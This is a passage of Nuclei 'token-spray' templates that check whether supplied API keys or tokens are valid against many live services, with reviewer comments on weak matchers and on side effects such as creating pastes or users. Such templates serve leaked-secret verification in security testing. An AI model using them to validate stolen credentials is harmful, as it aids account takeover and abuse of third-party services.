"https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"stat":' 23 | - '"formats":' 24 | - '"default_format":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-covalent.yaml: -------------------------------------------------------------------------------- 1 | id: api-covalent 2 | 3 | info: 4 | name: Covalent API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://www.covalenthq.com/docs/api/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Covalent.md 10 | tags: token-spray,covalent 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.covalenthq.com/v1/3/address/balances_v2/?&key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"address":' 23 | - '"updated_at":' 24 | - '"next_update_at":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-ddownload.yaml: -------------------------------------------------------------------------------- 1 | id: api-ddownload 2 | 3 | info: 4 | name: ddownload API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://ddownload.com/api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/ddownload.md 10 | tags: token-spray,ddownload 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api-v2.ddownload.com/api/account/info?key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"storage_left"' 23 | - '"premium_traffic_left"' 24 | - '"email"' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-dribbble.yaml: -------------------------------------------------------------------------------- 1 
| id: api-dribbble # Sends {{token}} as access_token to the Dribbble /v2/user endpoint; the only matcher is the HTTP status. 2 | 3 | info: 4 | name: Dribbble API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://developer.dribbble.com/v2/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md 10 | tags: token-spray,dribbble 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.dribbble.com/v2/user?access_token={{token}}" 17 | 18 | matchers: # NOTE(review): status-only match, so any 200 response counts as a valid token; a body word matcher on fields of the user object would cut false positives (field names to be confirmed against the API docs). 19 | - type: status 20 | status: 21 | - 200 22 | -------------------------------------------------------------------------------- /api-ebird.yaml: -------------------------------------------------------------------------------- 1 | id: api-ebird 2 | 3 | info: 4 | name: eBird API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://documenter.getpostman.com/view/664302/S1ENwy59 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/eBird.md 10 | tags: token-spray,ebird 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.ebird.org/v2/data/obs/KZ/recent" 17 | headers: 18 | X-eBirdApiToken: "{{token}}" 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"speciesCode":' 25 | - '"comName":' 26 | - '"sciName":' 27 | - '"locId":' 28 | condition: and 29 | -------------------------------------------------------------------------------- /api-etherscan.yaml: -------------------------------------------------------------------------------- 1 | id: api-etherscan 2 | 3 | info: 4 | name: Etherscan API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.etherscan.io/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Etherscan.md 10 | tags: token-spray,etherscan 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.etherscan.io/api?module=account&action=balance&address=0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae&tag=latest&apikey={{token}}" 17 | 18 | 
matchers-condition: and 19 | matchers: 20 | - type: word 21 | part: body 22 | negative: true 23 | words: 24 | - 'Invalid API Key' 25 | 26 | - type: word 27 | part: body 28 | words: 29 | - '"status":' 30 | - '"message":"OK"' 31 | condition: and 32 | -------------------------------------------------------------------------------- /api-europeana.yaml: -------------------------------------------------------------------------------- 1 | id: api-europeana # Sends {{token}} as wskey to the Europeana search endpoint and matches three bare words in the response body. 2 | 3 | info: 4 | name: Europeana API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://pro.europeana.eu/page/search 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md 10 | tags: token-spray,europeana 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: # NOTE(review): these are unquoted substrings with no status check, so an error body that also contains 'success', 'apikey' and 'action' would presumably match as well; confirm against an invalid-key response and tighten if so (e.g. match the success flag's value). 22 | - 'success' 23 | - 'apikey' 24 | - 'action' 25 | condition: and -------------------------------------------------------------------------------- /api-festivo.yaml: -------------------------------------------------------------------------------- 1 | id: api-festivo 2 | 3 | info: 4 | name: Festivo API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Festivo%20Public%20Holidays.md 10 | tags: token-spray,festivo 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"id":' 23 | - '"holidays":' 24 | - '"name":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-gofile.yaml: 
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted by GoFile's getAccountDetails endpoint.
# self-contained: the request goes to the fixed URL below, not to a scan target.
id: api-gofile

info:
  name: GoFile API Test
  author: daffainfo
  severity: info
  reference:
    - https://gofile.io/api
    - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/GoFile.md
  tags: token-spray,gofile

self-contained: true
requests:
  - method: GET
    path:
      # The token is carried in the query string, so it can end up wherever
      # request URLs are recorded (proxy logs, server access logs).
      - "https://api.gofile.io/getAccountDetails?token={{token}}&allDetails=true"

    matchers:
      # All three quoted key names must appear in the body (condition: and).
      # No status-code matcher is used.
      - type: word
        part: body
        words:
          - '"token"'
          - '"email"'
          - '"rootFolder"'
        condition: and

--------------------------------------------------------------------------------
/api-harvardart.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted as the apikey parameter of the
# Harvard Art Museums API by requesting one fixed color record.
id: api-harvardart

info:
  name: Harvard Art Museums API Test
  author: daffainfo
  severity: info
  reference:
    - https://github.com/harvardartmuseums/api-docs
    - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Harvard%20Art%20Museums.md
  tags: token-spray,harvardart

self-contained: true
requests:
  - method: GET
    path:
      # Key is sent as a query parameter.
      - "https://api.harvardartmuseums.org/color/34838442?apikey={{token}}"

    matchers:
      # Body must contain all three field names.
      - type: word
        part: body
        words:
          - '"colorid"'
          - '"name"'
          - '"hex"'
        condition: and

--------------------------------------------------------------------------------
/api-hirak-rates.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted by the Hirak Exchange Rates /stat/ endpoint.
id: api-hirak-rates

info:
  name: Hirak Exchange Rates API Test
  author: daffainfo
  severity: info
  reference:
    - https://rates.hirak.site/
    - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Hirak%20Exchange%20Rates.md
  tags: token-spray,hirak

self-contained: true
requests:
  - method: GET
    path:
      # Token is sent as a query parameter.
      - "https://rates.hirak.site/stat/?token={{token}}"

    matchers:
      # All four key names (each followed by a colon) must be present.
      - type: word
        part: body
        words:
          - '"token":'
          - '"plan":'
          - '"hits":'
          - '"remain":'
        condition: and

--------------------------------------------------------------------------------
/api-holidayapi.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted as the key parameter of Holiday API
# by requesting the US holiday list for 2020.
id: api-holidayapi

info:
  name: Holiday API Test
  author: daffainfo
  severity: info
  reference:
    - https://holidayapi.com/docs
    - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Holiday%20API.md
  tags: token-spray,holidayapi

self-contained: true
requests:
  - method: GET
    path:
      # Key is sent as a query parameter.
      - "https://holidayapi.com/v1/holidays?pretty&key={{token}}&country=US&year=2020&language=EN"

    matchers:
      - type: word
        part: body
        words:
          - '"holidays":'
          - '"name":'
          - '"date":'
        condition: and

--------------------------------------------------------------------------------
/api-iconfinder.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted as a Bearer token by the IconFinder
# v4 icon search endpoint.
id: api-iconfinder

info:
  name: IconFinder API Test
  author: daffainfo
  severity: info
  reference:
    - https://developer.iconfinder.com/reference/overview-1
    - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/IconFinder.md
  tags: token-spray,iconfinder

self-contained: true
requests:
  # Raw request: the token is sent in the Authorization header, not the URL.
  - raw:
      - |
        GET https://api.iconfinder.com/v4/icons/search?query=arrow&count=10 HTTP/1.1
        Host: api.iconfinder.com
        Accept: application/json
        Authorization: Bearer {{token}}

    matchers:
      # All three key names must appear in the body.
      - type: word
        part: body
        words:
          - '"icons":'
          - '"is_icon_glyph":'
          - '"download_url":'
        condition: and

--------------------------------------------------------------------------------
/api-improvmx.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted by the ImprovMX v3 account endpoint.
id: api-improvmx

info:
  name: ImprovMX API Test
  author: daffainfo
  severity: info
  reference:
    - https://improvmx.com/api
    - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ImprovMX.md
  tags: token-spray,improvmx

self-contained: true
requests:
  # HTTP Basic credentials are built with an empty user name and the token as
  # the password: base64(':' + token).
  - raw:
      - |
        GET https://api.improvmx.com/v3/account HTTP/1.1
        Authorization: Basic {{base64(':' + token)}}
        Host: api.improvmx.com

    # At most one redirect is followed.
    # NOTE(review): confirm the Authorization header is not replayed to a
    # different host when the redirect leaves api.improvmx.com.
    redirects: true
    max-redirects: 1
    matchers:
      # All three account fields must be present in the body.
      - type: word
        part: body
        words:
          - '"billing_email":'
          - '"cancels_on":'
          - '"company_details":'
        condition: and

--------------------------------------------------------------------------------
/api-instatus.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted as a Bearer token by the Instatus
# v1 pages endpoint.
id: api-instatus

info:
  name: Instatus API Test
  author: daffainfo
  severity: info
  reference:
    - https://instatus.com/help/api
    - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Instatus.md
  tags: token-spray,instatus

self-contained: true
requests:
  - method: GET
    path:
      - "https://api.instatus.com/v1/pages"
    headers:
      Authorization: Bearer {{token}}

    matchers:
      # All four key names must appear in the body.
      - type: word
        part: body
        words:
          - '"id":'
          - '"subdomain":'
          - '"name":'
          - '"logoUrl":'
        condition: and

--------------------------------------------------------------------------------
/api-iucn.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted by the IUCN Red List v3 API.
id: api-iucn

info:
  name: IUCN API Test
  author: daffainfo
  severity: info
  reference:
    - http://apiv3.iucnredlist.org/api/v3/docs
    - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/IUCN.md
  tags: token-spray,iucn

self-contained: true
requests:
  - method: GET
    path:
      # NOTE(review): the URL scheme is http://, so the token in the query
      # string crosses the network unencrypted. Switch to https:// if the
      # endpoint serves it — confirm before changing.
      - "http://apiv3.iucnredlist.org/api/v3/country/list?token={{token}}"

    matchers:
      # NOTE(review): the words below read like species-record fields while the
      # path requests country/list — verify that a valid token really produces
      # a body containing all three, otherwise this template never matches.
      - type: word
        part: body
        words:
          - 'taxonid'
          - 'scientific_name'
          - 'subspecies'
        condition: and

--------------------------------------------------------------------------------
/api-mailboxvalidator.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted as the key parameter of the
# MailboxValidator free-email endpoint, using test@test.com as the lookup.
id: api-mailboxvalidator

info:
  name: MailboxValidator API Test
  author: daffainfo
  severity: info
  reference:
    - https://www.mailboxvalidator.com/api-email-free
    - https://github.com/daffainfo/all-about-apikey/blob/main/Business/MailboxValidator.md
  tags: token-spray,mailboxvalidator

self-contained: true
requests:
  - method: GET
    path:
      # Key is sent as a query parameter.
      - "https://api.mailboxvalidator.com/v1/email/free?email=test@test.com&key={{token}}"

    matchers:
      # Requires the echoed address plus empty error_code and error_message
      # values, written without whitespace after the colon.
      - type: word
        part: body
        words:
          - '"email_address":"test@test.com"'
          - '"error_code":""'
          - '"error_message":""'
        condition: and

--------------------------------------------------------------------------------
/api-malshare.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted as the api_key parameter of the
# MalShare API by calling action=getlist.
id: api-malshare

info:
  name: MalShare API Test
  author: daffainfo
  severity: info
  reference:
    - https://malshare.com/doc.php
    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalShare.md
  tags: token-spray,malshare

self-contained: true
requests:
  - method: GET
    path:
      # Key is sent as a query parameter.
      - "https://api.malshare.com/api.php?api_key={{token}}&action=getlist"

    matchers:
      # Both hash field names must appear in the body.
      - type: word
        part: body
        words:
          - '"md5":'
          - '"sha1":'
        condition: and

--------------------------------------------------------------------------------
/api-micro-user-service.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted as a Bearer token by the M3O user
# service by reading the user record "usrid-1".
id: api-micro-user-service

info:
  name: Micro User Service API Test
  author: daffainfo
  severity: info
  reference:
    - https://m3o.com/user
    - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Micro%20User%20Service.md
  tags: token-spray,micro-user-service

self-contained: true
requests:
  # Raw POST with a JSON body; the token is sent in the Authorization header.
  - raw:
      - |
        POST https://api.m3o.com/v1/user/Read HTTP/1.1
        Host: api.m3o.com
        Content-Type: application/json
        Authorization: Bearer {{token}}
        Content-Length: 21

        {
          "id": "usrid-1"
        }

    matchers:
      # All four user-record fields must be present.
      - type: word
        part: body
        words:
          - '"username":'
          - '"email":'
          - '"created":'
          - '"updated":'
        condition: and

--------------------------------------------------------------------------------
/api-mojoauth.yaml:
--------------------------------------------------------------------------------
# Sends {{token}} in the X-API-Key header to the MojoAuth /token/jwks endpoint.
# NOTE(review): JWKS documents are often served without authentication. Confirm
# that an invalid key is rejected here; if it is not, every token would match.
id: api-mojoauth

info:
  name: MojoAuth API Test
  author: daffainfo
  severity: info
  reference:
    - https://mojoauth.com/docs/
    - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/MojoAuth.md
  tags: token-spray,mojoauth

self-contained: true
requests:
  - raw:
      - |
        POST https://api.mojoauth.com/token/jwks HTTP/1.1
        Host: api.mojoauth.com
        X-API-Key: {{token}}
    matchers:
      # Body must contain the three JWKS member names.
      - type: word
        part: body
        words:
          - '"keys"'
          - '"kty"'
          - '"kid"'
        condition: and

--------------------------------------------------------------------------------
/api-myanimelist.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted as a Bearer token by the MyAnimeList
# v2 anime search endpoint.
id: api-myanimelist

info:
  name: MyAnimeList API Test
  author: daffainfo
  severity: info
  reference:
    - https://myanimelist.net/apiconfig/references/api/v2
    - https://github.com/daffainfo/all-about-apikey/blob/main/Anime/MyAnimeList.md
  tags: token-spray,myanimelist

self-contained: true
requests:
  - method: GET
    path:
      - "https://api.myanimelist.net/v2/anime?q=one&limit=4"
    headers:
      Authorization: Bearer {{token}}

    matchers:
      - type: word
        part: body
        words:
          - '"data":'
          - '"paging":'
          - '"next":'
        condition: and

--------------------------------------------------------------------------------
/api-mywot.yaml:
--------------------------------------------------------------------------------
# Checks a Web of Trust credential pair: {{id}} goes into x-user-id and
# {{token}} into x-api-key, so both variables must be supplied.
id: api-mywot

info:
  name: My Web of Trust API
  author: daffainfo
  severity: info
  reference:
    - https://support.mywot.com/hc/en-us/sections/360004477734-API-
    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Web%20of%20Trust.md
  tags: token-spray,weboftrust

self-contained: true
requests:
  - raw:
      - |
        GET https://scorecard.api.mywot.com/v3/targets?t=hbo.com&t=google.com HTTP/1.1
        Host: scorecard.api.mywot.com
        x-user-id: {{id}}
        x-api-key: {{token}}

    matchers:
      # Both scorecard fields must be present in the body.
      - type: word
        part: body
        words:
          - '"target":'
          - '"safety":'
        condition: and

--------------------------------------------------------------------------------
/api-nownodes.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted in the api-key header by the Nownodes
# bsc-blockbook /api endpoint.
id: api-nownodes

info:
  name: Nownodes API Test
  author: daffainfo
  severity: info
  reference:
    - https://nownodes.io/
    - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Nownodes.md
  tags: token-spray,nownodes

self-contained: true
requests:
  - raw:
      - |
        GET https://bsc-blockbook.nownodes.io/api HTTP/1.1
        Host: bsc-blockbook.nownodes.io
        api-key: {{token}}
        Content-Type: application/json

    matchers:
      - type: word
        part: body
        words:
          - '"coin":'
          - '"host":'
          - '"version":'
        condition: and

--------------------------------------------------------------------------------
/api-orbintelligence.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted as the api_key parameter of the
# ORB Intelligence fetch endpoint.
id: api-orbintelligence

info:
  name: ORB Intelligence API Test
  author: daffainfo
  severity: info
  reference:
    - https://api.orb-intelligence.com/docs/
    - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ORB%20Intelligence.md
  tags: token-spray,orbintelligence

self-contained: true
requests:
  - method: GET
    path:
      # Key is sent as a query parameter.
      - "https://api.orb-intelligence.com/3/fetch/1/?api_key={{token}}"

    matchers:
      - type: word
        part: body
        words:
          - '"entity_type":'
          - '"company_status":'
          - '"orb_num":'
        condition: and

--------------------------------------------------------------------------------
/api-pastebin.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted as a Pastebin api_dev_key.
# Side effect: the request body asks for api_option=paste with
# api_paste_code=test, i.e. it submits a paste. NOTE(review): a valid key
# presumably leaves a paste behind on every run — confirm and clean up.
id: api-pastebin

info:
  name: Pastebin API Test
  author: daffainfo
  severity: info
  reference:
    - https://pastebin.com/doc_api
    - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Pastebin.md
  tags: token-spray,pastebin

self-contained: true
requests:
  # Content-Length is fixed at 81. The static part of the form body is 49
  # bytes, so 81 is exact only for a 32-character token.
  - raw:
      - |
        POST https://pastebin.com/api/api_post.php HTTP/1.1
        Host: pastebin.com
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 81

        api_dev_key={{token}}&api_paste_code=test&api_option=paste

    matchers:
      # Single word matcher: the body must contain a pastebin.com URL.
      - type: word
        part: body
        words:
          - 'https://pastebin.com/'

--------------------------------------------------------------------------------
/api-petfinder.yaml:
--------------------------------------------------------------------------------
# Checks a Petfinder OAuth2 client: {{id}} and {{secret}} are exchanged for an
# access token with the client_credentials grant.
id: api-petfinder

info:
  name: Petfinder API Test
  author: daffainfo
  severity: info
  reference:
    - https://www.petfinder.com/developers/v2/docs/
    - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/Petfinder.md
  tags: token-spray,petfinder

self-contained: true
requests:
  # Content-Length is fixed at 81. The static part of the form body is 55
  # bytes, so 81 is exact only when id and secret total 26 characters.
  # NOTE(review): confirm the engine recomputes the length after substitution.
  - raw:
      - |
        POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1
        Host: api.petfinder.com
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 81

        grant_type=client_credentials&client_id={{id}}&client_secret={{secret}}

    matchers:
      # A match means the body contains all three token-response fields.
      # NOTE(review): a verbose run may then record the issued access token.
      - type: word
        part: body
        words:
          - '"token_type"'
          - '"expires_in"'
          - '"access_token"'
        condition: and

--------------------------------------------------------------------------------
/api-pinata.yaml:
--------------------------------------------------------------------------------
# Checks a Pinata key pair: {{token}} goes into pinata_api_key and {{secret}}
# into pinata_secret_api_key, so both variables must be supplied.
id: api-pinata

info:
  name: Pinata API Test
  author: daffainfo
  severity: info
  reference:
    - https://docs.pinata.cloud/
    - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Pinata.md
  tags: token-spray,pinata

self-contained: true
requests:
  - raw:
      - |
        GET https://api.pinata.cloud/data/pinList?status=pinned HTTP/1.1
        Host: api.pinata.cloud
        pinata_api_key: {{token}}
        pinata_secret_api_key: {{secret}}

    matchers:
      # Both names must appear in the body.
      # NOTE(review): this presumably needs at least one pinned item on the
      # account — confirm what an empty pin list looks like.
      - type: word
        part: body
        words:
          - '"id"'
          - '"ipfs_pin_hash"'
        condition: and

--------------------------------------------------------------------------------
/api-quip.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted as a Bearer token by the Quip
# users/current endpoint.
id: api-quip

info:
  name: Quip API Test
  author: daffainfo
  severity: info
  reference:
    - https://quip.com/dev/automation/documentation
    - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Quip.md
  tags: token-spray,quip

self-contained: true
requests:
  - raw:
      - |
        GET https://platform.quip.com/1/users/current HTTP/1.1
        Host: platform.quip.com
        Authorization: Bearer {{token}}

    matchers:
      - type: word
        part: body
        words:
          - '"id":'
          - '"name":'
        condition: and

--------------------------------------------------------------------------------
/api-rijksmuseum.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted as the key parameter of the
# Rijksmuseum usersets endpoint.
id: api-rijksmuseum

info:
  name: Rijksmuseum API Test
  author: daffainfo
  severity: info
  reference:
    - https://data.rijksmuseum.nl/user-generated-content/api/
    - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Rijksmuseum.md
  tags: token-spray,rijksmuseum

self-contained: true
requests:
  - method: GET
    path:
      # Key is sent as a query parameter.
      - "https://www.rijksmuseum.nl/api/nl/usersets?key={{token}}&format=json&page=2"

    matchers:
      - type: word
        part: body
        words:
          - '"count":'
          - '"userSets":'
          - '"user":'
        condition: and

--------------------------------------------------------------------------------
/api-scanii.yaml:
--------------------------------------------------------------------------------
# Checks a Scanii key pair against the v2.1 ping endpoint.
# The Basic credential is built from the variables `api` and `secret`; a run
# that only sets `token` leaves `api` unset.
id: api-scanii

info:
  name: Scanii API Test
  author: daffainfo
  severity: info
  reference:
    - https://docs.scanii.com/v2.1/resources.html
    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Scanii.md
  tags: token-spray,scanii

self-contained: true
requests:
  - raw:
      - |
        GET https://api.scanii.com/v2.1/ping HTTP/1.1
        Authorization: Basic {{base64(api + ':' + secret)}}
        Host: api.scanii.com

    matchers:
      # The second word is whitespace-sensitive: it expects a space on both
      # sides of the colon, exactly as written.
      - type: word
        part: body
        words:
          - '"key"'
          - '"message" : "pong"'
        condition: and

--------------------------------------------------------------------------------
/api-smartsheet.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted as a Bearer token by the Smartsheet
# 2.0 home endpoint.
id: api-smartsheet

info:
  name: Smartsheet API Test
  author: daffainfo
  severity: info
  reference:
    - https://smartsheet.redoc.ly/
    - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Smartsheet.md
  tags: token-spray,smartsheet

self-contained: true
requests:
  - method: GET
    path:
      - "https://api.smartsheet.com/2.0/home?include=source"
    headers:
      Authorization: Bearer {{token}}

    # Both matchers must hold: HTTP 200 and the two key names in the body.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '"sheets":'
          - '"folders":'
        condition: and

--------------------------------------------------------------------------------
/api-stytch.yaml:
--------------------------------------------------------------------------------
# Checks a Stytch project id/secret pair against the test.stytch.com host.
# Side effect: the request is a POST to /v1/users with an e-mail address.
# NOTE(review): with valid credentials this presumably creates or looks up a
# user in the project's test environment — confirm.
id: api-stytch

info:
  name: Stytch API Test
  author: daffainfo
  severity: info
  reference:
    - https://stytch.com/docs/api
    - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Stytch.md
  tags: token-spray,stytch

self-contained: true
requests:
  - raw:
      - |
        POST https://test.stytch.com/v1/users HTTP/1.1
        Authorization: Basic {{base64(id + ':' + secret)}}
        Host: test.stytch.com
        Content-Type: application/json

        {"email": "test@stytch.com"}

    matchers:
      - type: word
        part: body
        words:
          - '"status_code":'
          - '"request_id":'
          - '"user_id":'
        condition: and
--------------------------------------------------------------------------------
/api-thecatapi.yaml:
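--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted in the x-api-key header by the
# TheCatApi v1 votes endpoint.
id: api-thecatapi

info:
  name: TheCatApi API Test
  author: daffainfo
  severity: info
  reference:
    - https://docs.thecatapi.com/
    - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md
  tags: token-spray,thecatapi

self-contained: true
requests:
  - method: GET
    path:
      - "https://api.thecatapi.com/v1/votes"
    headers:
      x-api-key: "{{token}}"

    matchers:
      # NOTE(review): both words describe a vote record, so this presumably
      # needs at least one vote on the account — confirm.
      - type: word
        part: body
        words:
          - '"country_code":'
          - '"created_at":'
        condition: and
--------------------------------------------------------------------------------
/api-thedogapi.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted in the x-api-key header by the
# TheDogApi v1 votes endpoint.
id: api-thedogapi

info:
  name: TheDogApi API Test
  author: daffainfo
  severity: info
  reference:
    - https://docs.thedogapi.com/
    - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheDogApi.md
  tags: token-spray,thedogapi

self-contained: true
requests:
  - method: GET
    path:
      - "https://api.thedogapi.com/v1/votes"
    headers:
      x-api-key: "{{token}}"

    matchers:
      # The words carry no opening quote, so 'id":' is also satisfied by the
      # tail of "image_id": or "sub_id": and adds nothing to the other two.
      - type: word
        part: body
        words:
          - 'id":'
          - 'image_id":'
          - 'sub_id":'
        condition: and

--------------------------------------------------------------------------------
/api-trello.yaml:
--------------------------------------------------------------------------------
# Checks a Trello key/token pair ({{key}} and {{token}}) against members/me.
id: api-trello

info:
  name: Trello API Test
  author: daffainfo
  severity: info
  reference:
    - https://developers.trello.com/
    - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Trello.md
  tags: token-spray,trello

self-contained: true
requests:
  - method: GET
    path:
      # Both credentials are sent as query parameters.
      - "https://api.trello.com/1/members/me?key={{key}}&token={{token}}"

    # The negative word matcher alone reports a hit for any response that does
    # not contain 'invalid key', which includes other error bodies (a rejected
    # token, rate limiting, a gateway error page). Requiring HTTP 200 as well
    # keeps those from being reported as working credentials.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        negative: true
        words:
          - 'invalid key'

--------------------------------------------------------------------------------
/api-urlscan.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted in the API-Key header by the urlscan.io
# user quotas endpoint.
id: api-urlscan

info:
  name: URLScan API Test
  author: daffainfo
  severity: info
  reference:
    - https://urlscan.io/docs/api/
    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/URLScan.md
  tags: token-spray,urlscan

self-contained: true
requests:
  - raw:
      - |
        GET https://urlscan.io/user/quotas/ HTTP/1.1
        Host: urlscan.io
        Content-Type: application/json
        API-Key: {{token}}

    matchers:
      # NOTE(review): the three words look like response header names, yet the
      # matcher inspects the body. Verify against a known-good key; if they
      # only occur as headers this never matches. Before moving it to
      # `part: header`, check that unauthenticated responses do not carry the
      # same headers.
      - type: word
        part: body
        words:
          - 'X-Rate-Limit-Scope:'
          - 'X-Rate-Limit-Limit:'
          - 'X-Rate-Limit-Remaining:'
        condition: and

--------------------------------------------------------------------------------
/api-virustotal.yaml:
--------------------------------------------------------------------------------
# Checks whether {{token}} is accepted as a VirusTotal v2 apikey.
# Side effect: the request submits google.com to the url/scan endpoint, so
# each run with a valid key counts against that key's quota.
id: api-virustotal

info:
  name: VirusTotal API Test
  author: daffainfo
  severity: info
  reference:
    - https://developers.virustotal.com/reference
    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md
  tags: token-spray,virustotal

self-contained: true
requests:
  # Content-Length is fixed at 86. The static part of the form body is 22
  # bytes, so 86 is exact only for a 64-character token.
  - raw:
      - |
        POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1
        Host: www.virustotal.com
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 86

        apikey={{token}}&url=google.com

    matchers:
      # The v2 API answers in JSON, where key names are double-quoted. The
      # earlier single-quoted words ('verbose_msg': and so on) could not occur
      # in a JSON body, so a valid key was never reported.
      - type: word
        part: body
        words:
          - '"verbose_msg":'
          - '"scan_date":'
          - '"permalink":'
        condition: and

--------------------------------------------------------------------------------
/api-web3storage.yaml: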
